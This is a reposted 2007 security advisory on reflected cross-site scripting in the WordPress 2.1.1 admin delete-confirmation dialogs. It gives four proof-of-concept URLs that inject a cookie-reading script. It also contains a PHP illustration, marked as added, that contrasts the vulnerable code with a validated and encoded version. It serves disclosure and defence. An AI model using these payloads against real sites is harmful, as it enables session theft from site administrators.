scip-2962.txt

2007-03-06T00:00:00
ID PACKETSTORM:54803
Type packetstorm
Reporter scip.ch
Modified 2007-03-06T00:00:00

Description

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
WordPress 2.1.1 - Multiple Script Injection Vulnerabilities  
  
scip AG Vulnerability ID 2962 (02/27/2007)  
http://www.scip.ch/cgi-bin/smss/showadvf.pl?id=2962  
  
I. INTRODUCTION  
  
"WordPress is a state-of-the-art semantic personal publishing platform   
with a focus on aesthetics, web standards, and usability."  
More information is available on the project web site at the following URL:  
  
http://www.wordpress.org  
  
II. DESCRIPTION  
  
Stefan Friedli found several vulnerabilities while following up on an   
advisory entitled "WordPress AdminPanel CSRF/XSS - 0day" by "Samenspender",   
which described a lack of input validation when deleting posts that allows   
the injection of arbitrary script code. That advisory was published on   
February 26th and is referenced in section VII.  
  
That advisory was limited to manipulating the "post" parameter. There are   
several other vulnerabilities of the same kind: every administrative   
operation that goes through the common confirmation dialog reflects its   
unvalidated identifier parameter into the page and is therefore open to   
the same type of attack.  
  
Possible injection...  
  
... when deleting posts, as mentioned in Samenspender's advisory   
(unvalidated parameter: post, file: post.php)  
http://target.tld/wp-admin/post.php?action=delete&post='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E  
  
... when deleting comments (unvalidated parameter: c, file: comment.php)  
http://target.tld/wp-admin/comment.php?action=deletecomment&p=39&c='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E  
  
... when deleting pages (unvalidated parameter: page, file: page.php)  
http://target.tld/wp-admin/page.php?action=delete&post='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E  
  
... when deleting categories (unvalidated parameter: cat_ID, file:   
categories.php)  
http://target.tld/wp-admin/categories.php?action=delete&cat_ID='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E  
  
IV. IMPACT  
  
This list may not be exhaustive. It illustrates that the flaw in the   
WordPress confirmation dialog is not limited to the "Delete   
Post" function. Fixing the validation of the post parameter alone, as   
suggested by e.g. Secunia, does not fix the problem and does not reduce   
the threat of cross-site scripting or any other web-based exploitation   
through the remaining parameters.  
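The following PHP is an added illustration and is not code from WordPress or from scip AG. It is a simplified reconstruction (an assumption, since the advisory does not quote the affected code) of a confirmation dialog that rebuilds the caller's request into a single-quoted href and so re-emits the untrusted object identifier; the function names, the placeholder nonce and the sample inputs are constructed for this example. It shows why a fix inside the shared dialog (validate the identifier as an integer, entity-encode everything written into the attribute) covers all of the listed operations at once, whereas patching the "post" parameter alone does not.

```php
<?php
// Added illustration of the advisory's bug class. This is NOT WordPress 2.1.1
// code: it is a simplified reconstruction (an assumption) of a confirmation
// dialog that re-emits an untrusted GET parameter inside a single-quoted
// href attribute.

declare(strict_types=1);

// Vulnerable pattern: the id taken from the query string is copied verbatim
// into the "Yes" link. The advisory's payload '><script>... closes the quoted
// attribute and the <a> tag, so the script element lands in the page.
function render_confirm_dialog_vulnerable(string $script, string $action, string $id, string $nonce): string
{
    $target = "/wp-admin/{$script}?action={$action}&post={$id}&_wpnonce={$nonce}";
    return "<p>Are you sure you want to do this?</p>\n"
         . "<p><a href='{$target}'>Yes</a> <a href='/wp-admin/'>No</a></p>\n";
}

// Hardened pattern, two independent layers:
//   1. Validate: a post/comment/category id is a positive integer, so reject
//      anything else before it reaches any output (fail closed).
//   2. Encode: whatever is emitted into an attribute is entity-encoded with
//      ENT_QUOTES so that neither ' nor " nor < can break out of it.
function validate_object_id(string $raw): ?int
{
    if (preg_match('/^[1-9][0-9]*$/', $raw) !== 1) {
        return null;
    }
    return (int) $raw;
}

function attr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML401, 'UTF-8');
}

function render_confirm_dialog_safe(string $script, string $action, string $id, string $nonce): string
{
    $objectId = validate_object_id($id);
    if ($objectId === null) {
        // Do not echo the rejected value back; a generic error is enough.
        return "<p>Invalid request.</p>\n";
    }
    $target = "/wp-admin/{$script}?action={$action}&post={$objectId}&_wpnonce=" . rawurlencode($nonce);
    return "<p>Are you sure you want to do this?</p>\n"
         . "<p><a href='" . attr($target) . "'>Yes</a> <a href='/wp-admin/'>No</a></p>\n";
}

// Demo with the payload from the advisory, URL-decoded as PHP sees it in $_GET.
$payload = "'><script>alert(document.cookie)</script>";
$nonce   = 'deadbeef12';   // constructed placeholder, not a real nonce

echo "--- vulnerable ---\n";
echo render_confirm_dialog_vulnerable('post.php', 'delete', $payload, $nonce);
// The <script> element survives verbatim inside the dialog.

echo "--- hardened, attacker input ---\n";
echo render_confirm_dialog_safe('post.php', 'delete', $payload, $nonce);
// Rejected before anything is rendered.

echo "--- hardened, legitimate id ---\n";
echo render_confirm_dialog_safe('post.php', 'delete', '39', $nonce);
// href='/wp-admin/post.php?action=delete&amp;post=39&amp;_wpnonce=deadbeef12'
```

Run it with the php command-line interpreter. The validation layer alone would stop the payloads listed above, but the encoding layer is what protects against the next parameter the shared dialog happens to echo, which is exactly why a fix limited to the "post" parameter leaves the other operations exposed.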
  
V. DETECTION  
  
These flaws can be detected with any web browser by requesting one of the   
URLs above against a vulnerable installation and observing whether the   
injected script executes in the confirmation page.  
  
VI. SOLUTION  
  
Until these issues are patched, possible workarounds are fixing the   
affected files manually (validating the identifier parameters as integers   
and encoding them on output) or deploying an application-level filter   
such as mod_security for Apache that rejects non-numeric values for   
these parameters.  
  
VII. SOURCES  
  
Samenspender - WordPress AdminPanel CSRF/XSS - 0day  
http://seclists.org/bugtraq/2007/Feb/0494.html  
  
scip AG - Security Consulting Information Process (German)  
http://www.scip.ch  
  
scip AG Vulnerability Database (German)  
http://www.scip.ch/cgi-bin/smss/showadvf.pl?id=2962  
  
VIII. DISCLOSURE TIMELINE  
  
02/26/07 Release of the "Delete Post" confirmation vulnerability  
02/27/07 Identification of further vulnerabilities  
02/27/07 Immediate release for informational purposes  
  
IX. CREDITS  
  
The vulnerabilities were discovered by Stefan Friedli.  
  
Stefan Friedli, scip AG, Zuerich, Switzerland  
stfr-at-scip.ch  
http://www.scip.ch  
  
A2. LEGAL NOTICES  
  
Copyright (c) 2007 scip AG, Switzerland.  
  
Permission is granted for the re-distribution of this alert. It may not   
be edited in any way without permission of scip AG.  
  
The information in the advisory is believed to be accurate at the time   
of publishing based on currently available information. There are no   
warranties with regard to this information. Neither the author nor the   
publisher accepts any liability for any direct, indirect or   
consequential loss or damage from use of or reliance on this advisory.  
  
-----BEGIN PGP SIGNATURE-----  
Version: PGP Desktop 9.0.6  
  
iQA/AwUBReRJv1J79Mw3xa1EEQJXagCdHOT7ib4I8XSqMsaUAKA8vaO8i8QAn2SS  
oTWNsT+cOMwFq+XKsZqq6yJ/  
=REO6  
-----END PGP SIGNATURE-----  